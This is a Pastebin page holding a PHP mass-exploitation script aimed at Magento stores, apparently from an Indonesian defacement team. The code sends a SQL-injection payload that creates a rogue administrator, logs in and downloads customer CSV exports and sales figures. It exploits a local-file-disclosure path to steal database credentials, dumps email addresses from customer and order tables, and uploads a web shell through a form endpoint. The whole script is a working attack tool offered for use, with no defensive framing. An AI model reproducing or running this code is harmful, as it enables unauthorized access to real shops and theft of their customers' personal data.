AZZATSSINS_CYBERSERK

Magento Spesial (Add,Upload,LFD)

Mar 24th, 2017
1,636
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /**
  3. * Code Name     : Auto Exploit Magento
  4. * Release       : 2.0.1 build 13816
  5. * Author        : SHOR7CUT (http://facebook.com/bug7sec)
  6. * Team          : BUG7SEC | INDOXPLOIT CODERS TEAM | TUBAN CYBER TEAM | DEFACER TERSAKITI TEAM
  7. *
  8. * PHP Version   : 5.5.35
  9. */
  10. error_reporting(0);
  11. set_time_limit();
  12. session_start();
  13. $Magento = new Magento;
  14. $Magento->username("kodomo123");
  15. $Magento->password("kodomo123");
  16. $Magento->target("target.txt");
  17. $Magento->result("magento-result.txt");
  18. $Magento->shellog("magento-shell.txt");
  19. $Magento->mailog("magento-maillog.txt");
  20. $Magento->xml("magento-xml.txt");
  21. $Magento->shell("shc.php");
  22. $Magento->cookies("cookies.txt");
  23. $Magento->saveCSV("MAGENTO");
  24. $Magento->run();
  25.  
  26. class Magento //extends Exploit
  27. {
  28.     var $username;
  29.     var $password;
  30.     var $target;
  31.     var $result;
  32.     var $email;
  33.     var $saveCSV;
  34.     var $shell;
  35.     var $shellog;
  36.     var $mailog;
  37.  
  38.     public function username($username) {return $this->username = $username;}
  39.     public function password($password) {return $this->password = $password;}
  40.     public function target($target)     {return $this->target   = $target;}
  41.     public function result($result)     {return $this->result   = $result;}
  42.     public function setJsite($result)   {return $this->Jsite    = $result;}
  43.     public function shell($shell)       {return $this->shell    = $shell;}
  44.     public function xml($xml)           {return $this->xml      = $xml;}
  45.     public function mailog($mailog)     {return $this->mailog   = $mailog;}
  46.     public function cookies($cookies)   {return $this->cookies  = $cookies;}
  47.     public function shellog($shellog)   {return $this->shellog  = $shellog;}
  48.     public function email(){
  49.         return $this->email = substr(md5(time()),2,15)."@bug7sec.com";
  50.     }
  51.     public function saveCSV($saveCSV){
  52.         return $this->saveCSV = $saveCSV;
  53.     }
  54.     public function pesan($pesan){
  55.         echo "[".date("H:i:s")."] ".$pesan."\r\n";
  56.     }
  57.     public function create_session($data){
  58.         return $_SESSION["data"][] = $data;
  59.     }
  60.     public function check_required(){
  61.         if(! file_exists($this->target) ){
  62.             $this->pesan("-> Tidak ditemukan File");
  63.             exit();
  64.         }
  65.         if(! function_exists('curl_version') ){
  66.             echo "+ CURL tidak terinstall\r\n";
  67.             exit;
  68.         }
  69.         if (!file_exists("BUG7SEC-TEAM")) {
  70.             mkdir("BUG7SEC-TEAM",0777);
  71.             mkdir("BUG7SEC-TEAM/".$this->saveCSV,0777);
  72.         }
  73.     }
  74.  
  75.     public function clean(){
  76.         unlink("cookie.txt");
  77.         unlink(getcwd().'/cookie.txt');
  78.         return true;
  79.     }
  80.     public function host($sites){
  81.         return parse_url($sites, PHP_URL_HOST);
  82.     }
  83.     public function saves($nama,$data){
  84.       $myfile = fopen("BUG7SEC-TEAM/".$nama, "a+") or die("Unable to open file!");
  85.       fwrite($myfile, $data);
  86.       fclose($myfile);
  87.     }
  88.  
  89.     public function generate($sites){
  90.         $sites = parse_url($sites, PHP_URL_HOST);
  91.         $this->pesan("[ Generate URL ] ".$sites);
  92.         $ch = curl_init($sites);
  93.         curl_setopt($ch, CURLOPT_HEADER, false);
  94.         curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
  95.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  96.         curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  97.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  98.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  99.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  100.         curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  101.         $html = curl_exec($ch);
  102.         $redirectURL = curl_getinfo($ch,CURLINFO_EFFECTIVE_URL );
  103.         curl_close($ch);
  104.         if( parse_url($redirectURL, PHP_URL_PATH) != "/" ){
  105.             $uRL = "http://".parse_url($redirectURL, PHP_URL_HOST).parse_url($redirectURL, PHP_URL_PATH);
  106.         }else{
  107.             $uRL = "http://".parse_url($redirectURL, PHP_URL_HOST)."/";
  108.         }
  109.         $redirect   = array(
  110.             'admin'     => $uRL."admin",
  111.             'download'  => $uRL."downloader",
  112.             'upload'    => $uRL."js/webforms/upload/",
  113.             'xml'       => $uRL,
  114.             'payload'   => $uRL."admin/Cms_Wysiwyg/directive/index"
  115.         );
  116.         $noredirect = array(
  117.             'admin'     => "http://".parse_url($redirectURL, PHP_URL_HOST)."/admin",
  118.             'download'  => "http://".parse_url($redirectURL, PHP_URL_HOST)."/downloader",
  119.             'upload'    => "http://".parse_url($redirectURL, PHP_URL_HOST)."/js/webforms/upload/",
  120.             'xml'       => "http://".parse_url($redirectURL, PHP_URL_HOST),
  121.             'payload'   => "http://".parse_url($redirectURL, PHP_URL_HOST)."/admin/Cms_Wysiwyg/directive/index"
  122.         );
  123.         $jsonSites = array(
  124.             'redirect'      => $redirect,
  125.             'noredirect'    => $noredirect);
  126.         return $this->Jsite = $jsonSites;
  127.     }
  128.  
  129.     public function magento_content($sites){
  130.         $ch = curl_init($sites);
  131.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  132.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  133.         curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  134.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
  135.         curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  136.         curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  137.         curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  138.         curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/'.$this->cookies);
  139.         curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/'.$this->cookies);
  140.         $data = curl_exec ($ch);
  141.         return $data;
  142.     }
  143.     public function magento_rewire($value){
  144.         if(!isset($value)){
  145.             return "-";
  146.         }
  147.             return $value;
  148.     }
  149.  
  150.     public function payload($sites){
  151.         $post = array(
  152.         "___directive"    => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  153.         "filter"          => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT =  'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '".$this->password."') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','".$this->email."','".$this->username."',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '".$this->username."'),'Firstname');"),
  154.         "forwarded"       => 1
  155.         );
  156.         $ch = curl_init();
  157.         curl_setopt($ch, CURLOPT_URL, $sites);
  158.         curl_setopt($ch, CURLOPT_HEADER, false);
  159.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  160.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  161.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  162.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  163.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  164.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  165.         curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  166.         curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
  167.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
  168.         curl_setopt($ch, CURLOPT_VERBOSE, false);
  169.         curl_setopt($ch, CURLOPT_POST, true);
  170.         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  171.         $data = curl_exec($ch);
  172.         $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  173.         curl_close($ch);
  174.         if($httpcode == "200"){
  175.             return true;
  176.         }else{
  177.             return false;
  178.         }
  179.     }
  180.  
  181.     public function admin($sites){
  182.         /* ------- ambil token login ------- */
  183.         $regex_loginTOKEN = "/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\" \\/>/";
  184.         preg_match($regex_loginTOKEN, $this->magento_content($sites) , $token);
  185.         /* ---------------------------------- */
  186.         $ch = curl_init();
  187.         curl_setopt($ch, CURLOPT_URL, $sites);
  188.         curl_setopt($ch, CURLOPT_HEADER, false);
  189.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  190.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  191.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  192.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  193.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  194.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT ,0);
  195.         curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  196.         curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
  197.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
  198.         curl_setopt($ch, CURLOPT_VERBOSE, false);
  199.         curl_setopt($ch, CURLOPT_POST, true);
  200.         curl_setopt($ch, CURLOPT_POSTFIELDS, "form_key=".$token[1]."&login[username]=".$this->username."&login[password]=".$this->password);
  201.         $data = curl_exec($ch);
  202.         $regex_result = "/<span class=\"price\">(.*?)<\\/span>/";
  203.         preg_match_all($regex_result    , $data , $matches);
  204.         if($matches[0][0]){
  205.             $pesan_.=    "[ Admin Login ] ".$sites."\r\n";
  206.             $this->pesan("[ Admin Login ] ".$this->host($sites)." +[OK]");
  207.             /*------------------ start:customer -----------------------*/
  208.             $regex_cusTOKEN = "/\\/customer\\/index\\/key\\/(.*?)\\//";
  209.             preg_match_all($regex_cusTOKEN  , $data , $matchToken);
  210.             $ch = curl_init($sites."/customer/index/key/".$matchToken[1][0]);
  211.             curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  212.             curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  213.             curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  214.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
  215.             curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  216.             curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  217.             curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  218.             curl_setopt ($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
  219.             curl_setopt ($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
  220.             $resultsCUS = curl_exec($ch);
  221.             $cusRegex = "/<span id=\"customerGrid-total-count\" class=\"no-display\">(.*?)<\\/span>/";
  222.             preg_match($cusRegex, $resultsCUS, $cusCount);
  223.             if( $cusCount[1] ){
  224.                 $pesan_.=    "[ Data customer ] ".$cusCount[1]."\r\n";
  225.                 $this->pesan("[ Data customer ] ".$cusCount[1]." customer");
  226.             }
  227.             $this->pesan("[ Data Customer ] Mencoba download customer");
  228.             $exportCsv = "/<option value=\"(.*?)\">CSV<\\/option>/";
  229.             preg_match($exportCsv, $resultsCUS, $matchesCsv);
  230.             $ch = curl_init();
  231.             curl_setopt ($ch, CURLOPT_URL, $matchesCsv[1]);
  232.             curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  233.             curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
  234.             curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  235.             curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  236.             curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  237.             curl_setopt ($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
  238.             curl_setopt ($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
  239.             curl_setopt ($ch, CURLOPT_HEADER, 0);
  240.             $out = curl_exec($ch);
  241.             curl_close($ch);
  242.             $fp = fopen("BUG7SEC-TEAM/".$this->saveCSV."/".parse_url($sites, PHP_URL_HOST).'.csv', 'w');
  243.             fwrite($fp, $out);
  244.             fclose($fp);
  245.             if($fp){
  246.                 $pesan_.=    "[ Data Customer ] berhasil di download\r\n";
  247.                 $this->pesan("[ Data Customer ] berhasil di download");
  248.             }else{
  249.                 $pesan_.=    "[ Data Customer ] gagal di download\r\n";
  250.                 $this->pesan("[ Data Customer ] gagal di download");
  251.             }
  252.             /*---------------------------- end:customer | start:order -----------------------*/
  253.             $regex_ajaxBlock = "/ajaxBlock\\/key\\/(.*?)\\//";
  254.             preg_match($regex_ajaxBlock, $data, $matchesajaxBlock);
  255.             $tk = $matchesajaxBlock[1];
  256.             $periodeAct = array(
  257.                 'Hari'      => '24h',
  258.                 'Minggu'    => '7d',
  259.                 'Bulan'     => '1m',
  260.                 'Tahun'     => '1y'
  261.             );                
  262.             foreach ($periodeAct as $key => $prioValue) {
  263.                 $link_periode = $sites."/dashboard/ajaxBlock/block/totals/key/".$tk."/period/".$prioValue."/?isAjax=true";
  264.                 $ch = curl_init($link_periode);
  265.                 curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  266.                 curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  267.                 curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  268.                 curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
  269.                 curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  270.                 curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  271.                 curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  272.                 curl_setopt($ch, CURLOPT_COOKIEJAR,  getcwd().'/'.$this->cookies);
  273.                 curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/'.$this->cookies);
  274.                 $prioResult = curl_exec($ch);
  275.                 $ajaxBlockprice = "/\"price\">(.*?)</";
  276.                 preg_match_all($ajaxBlockprice, $prioResult, $prioMatch);
  277.                 $pesan_ .= "[ Order Period ] ".$periodeAct[$key]  ." : ".
  278.                     $this->magento_rewire($prioMatch[1][0])." | ".
  279.                     $this->magento_rewire($prioMatch[1][1])." | ".
  280.                     $this->magento_rewire($prioMatch[1][2])."\r\n";
  281.                 $this->pesan("[ Order Period ] ".$periodeAct[$key]  ." -> ".
  282.                     $this->magento_rewire($prioMatch[1][0])." | ".
  283.                     $this->magento_rewire($prioMatch[1][1])." | ".
  284.                     $this->magento_rewire($prioMatch[1][2]));
  285.             }
  286.             $IDE = "/<span>IDE<\\/span>/";
  287.             $WP = "/<span>WordPress<\\/span>/";
  288.             $Smtp = "/SMTP/";
  289.             $Mandrill = "/Mandrill/";
  290.             preg_match_all($IDE     , $data , $matchIDE);
  291.             preg_match_all($WP      , $data , $matchWP);
  292.             preg_match_all($Smtp    , $data , $matchesSMTP);
  293.             preg_match($Mandrill    , $data , $matchesMandril);
  294.  
  295.             if($matchIDE[0][0]){
  296.                 $pesan_ .= "[+] IDE Home : Found !!!\r\n";
  297.             }
  298.             if($matchWP[0][0]){
  299.                 $pesan_ .= "[+] WP Home  : Found !!!\r\n";
  300.             }
  301.             if($matchesSMTP[0][0]){
  302.                 $pesan_ .= "[+] SMTP     : Found !!!\r\n";
  303.             }
  304.             if($matchesMandril[0][0]){
  305.                 $pesan_ .= "[+] Mandril  : Found !!!\r\n";
  306.             }
  307.             return $pesan_;
  308.         }else{
  309.             $this->pesan("[Admin Redirect ] ".$this->host($sites)." +[FAIL]");
  310.             return false;
  311.         }
  312.     }
  313.  
  314.     public function downloader($sites){
  315.         $this->pesan("[ Download Login ] ".$this->host($sites));
  316.         $ch = curl_init();
  317.         curl_setopt($ch, CURLOPT_URL, $sites);
  318.         curl_setopt($ch, CURLOPT_HEADER, false);
  319.         curl_setopt($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  320.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  321.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  322.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  323.         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  324.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
  325.         curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  326.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  327.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
  328.         curl_setopt($ch, CURLOPT_VERBOSE, false);
  329.         curl_setopt($ch, CURLOPT_POST, true);
  330.         curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$this->username."&password=".$this->password);
  331.         $data = curl_exec($ch);
  332.         if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  333.             $this->pesan("[ Download Login ] ".$this->host($sites)." +[OK]");
  334.             $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  335.               $pesan_ .= "[ Download URL ] ".$sites."\r\n";
  336.               $pesan_ .= "[ Download Login ] Success (Permission ".$permission.")\r\n\n";
  337.             $this->pesan("[ Download Login ] Success (Permission ".$permission.")");
  338.         }else{
  339.             $pesan_ .= "[ Download Login ] failed\r\n\n";
  340.             $this->pesan("[Download Login ] ".$this->host($sites)." +[FAIL]");
  341.         }
  342.         return $pesan_;
  343.     }
  344.  
  345.     public function LocalFileDiscloure($target){
  346.       $path = array(
  347.                "/app/etc/local.xml",
  348.                "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  349.       );
  350.       for($i=0;$i<=count($path);$i++){
  351.          $test = $this->magento_content($target.$path[$i]);
  352.          if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
  353.          $re = "/<![CDATA[]+(.*?)[]]]>/";
  354.          preg_match_all($re, $test, $matches);
  355.  
  356.          if(isset($matches[1][0])){
  357.          $this->pesan("[ LFD Magento ] ".$this->host($target)." +[OK]");
  358.          $shc_host = $matches[1][0];
  359.          $shc_host = $matches[1][3];
  360.          $shc_user = $matches[1][4];
  361.          $shc_pass = $matches[1][5];
  362.          $shc_db   = $matches[1][6];
  363.          $infone   .= "------------------------------\r\n";
  364.          $infone   .= "URL      : ".$target."\r\n";
  365.          $infone   .= "Host     : ".$shc_host."\r\n";
  366.          $infone   .= "Username : ".$shc_user."\r\n";
  367.          $infone   .= "Password : ".$shc_pass."\r\n";
  368.          $infone   .= "Database : ".$shc_db."\r\n";
  369.          $infone   .= "------------------------------\r\n";
  370.             $this->saves($this->xml,$infone);
  371.             mysql_connect($shc_host, $shc_user , $shc_pass);
  372.             mysql_select_db($shc_db);
  373.             $query = array(
  374.                     'admin_user'                    => 'SELECT * FROM admin_user' ,
  375.                     'aw_blog_comment'               => 'SELECT * FROM aw_blog_comment' ,
  376.                     'core_email_queue_recipients'   => 'SELECT * FROM core_email_queue_recipients' ,
  377.                     'customer_entity'               => 'SELECT * FROM customer_entity' ,
  378.                     'newsletter_subscriber'         => 'SELECT * FROM newsletter_subscriber' ,
  379.                     'newsletter_template'           => 'SELECT * FROM newsletter_template' ,
  380.                     'sales_flat_order_address'      => 'SELECT * FROM sales_flat_order_address' ,
  381.                     'sales_flat_quote'              => 'SELECT * FROM sales_flat_quote' ,
  382.                     'sales_recurring_profile'       => 'SELECT * FROM sales_recurring_profile'
  383.             );
  384.             $shcolom = array(
  385.                     'admin_user'                    => 'email' ,
  386.                     'aw_blog_comment'               => 'email' ,
  387.                     'core_email_queue_recipients'   => 'recipient_email' ,
  388.                     'customer_entity'               => 'email' ,
  389.                     'newsletter_subscriber'         => 'subscriber_email' ,
  390.                     'newsletter_template'           => 'template_sender_email' ,
  391.                     'sales_flat_order_address'      => 'email' ,
  392.                     'sales_flat_quote'              => 'customer_email' ,
  393.                     'sales_recurring_profile'       => 'SELECT * FROM admin_user'
  394.                 );
  395.                 foreach ($query as $shc_key => $shc_query) {
  396.                     $hasil = mysql_query($shc_query);
  397.                         while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
  398.                             $mail[] = $kolom_db[$shcolom[$shc_key]];
  399.                         }
  400.                 }
  401.                
  402.                 foreach ($mail as $key => $emailes) {
  403.                     $this->saves($this->mailog,$emailes."\r\n");
  404.                 }
  405.             }else{
  406.                 $this->pesan("[ LFD Magento ] ".$this->host($sites)." +[FAIL]");
  407.             }
  408.          }
  409.       }
  410.     }
  411.  
  412.     public function webforms($sites){
  413.         $this->pesan("[ webforms ] ".$this->host($sites));
  414.         $post = array('files[]'=>"@".$this->shell) ;
  415.         $ch = curl_init();
  416.         curl_setopt ($ch, CURLOPT_URL, $sites);
  417.         curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
  418.         curl_setopt ($ch, CURLOPT_POST, true);
  419.         curl_setopt ($ch, CURLOPT_POSTFIELDS,$post);
  420.         curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  421.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  422.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  423.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT ,0);
  424.         curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  425.         $data = curl_exec($ch);
  426.         curl_close($ch);
  427.         $json = json_decode($data,true);
  428.         if( $json['0']['url'] ){
  429.             $this->saves($this->shellog,"Shell : ".$json['0']['url']."\r\n");
  430.             return true;
  431.         }
  432.             return false;
  433.     }
  434.  
  435.  
  436.     public function run(){
  437.         $this->check_required();
  438.         $load_file = file_get_contents($this->target);
  439.         $load_file = explode("\r\n", $load_file );
  440.         $cnfile     = count($load_file);
  441.         $is = 1;
  442.         foreach ($load_file as $key => $sites) {
  443.         $this->pesan("[ Informasi ] Target ".$is."/".$cnfile." Situs");
  444.         $this->clean();
  445.         $this->generate($sites);
  446.  
  447.         if ( $this->payload($this->Jsite['noredirect']['payload']) ){
  448.  
  449.             $this->pesan("[ Payload Noredirect ] ".$this->host($this->Jsite['noredirect']['payload'])." +[OK]");
  450.            
  451.             $admin    = $this->admin($this->Jsite['noredirect']['admin']);
  452.             $download = $this->downloader($this->Jsite['noredirect']['download']);
  453.            
  454.             $this->saves($this->result,$admin);
  455.             $this->saves($this->result,$download);
  456.  
  457.         }else if ( $this->payload($this->Jsite['redirect']['payload']) ){
  458.  
  459.             $this->pesan("[ Payload redirect ] ".$this->host($this->Jsite['redirect']['payload'])." +[OK]");
  460.            
  461.             $admin    = $this->admin($this->Jsite['redirect']['admin']);
  462.             $download = $this->downloader($this->Jsite['redirect']['download']);
  463.  
  464.             $this->saves($this->result,$admin);
  465.             $this->saves($this->result,$download."\r\n\n");
  466.  
  467.         }else{
  468.             $this->pesan("[ Payload nore/redir ] ".$this->host($sites)." +[Not Vuln]");
  469.         }
  470.  
  471.    
  472.         if($this->Jsite['noredirect']['xml'] == $this->Jsite['redirect']['xml'] ){
  473.             $this->LocalFileDiscloure($this->Jsite['noredirect']['xml']);
  474.         }else{
  475.             $this->LocalFileDiscloure($this->Jsite['noredirect']['xml']);
  476.             $this->LocalFileDiscloure($this->Jsite['redirect']['xml']);
  477.         }
  478.        
  479.         if( $this->Jsite['noredirect']['upload'] == $this->Jsite['redirect']['upload'] ){
  480.                 $this->webforms($this->Jsite['redirect']['upload']);
  481.         }else{
  482.                 $this->webforms($this->Jsite['redirect']['upload']);
  483.                 $this->webforms($this->Jsite['noredirect']['upload']);
  484.         }
  485.             echo "\r\n";
  486.             $is++;
  487.         }
  488.     }
  489.  
  490. }
RAW Paste Data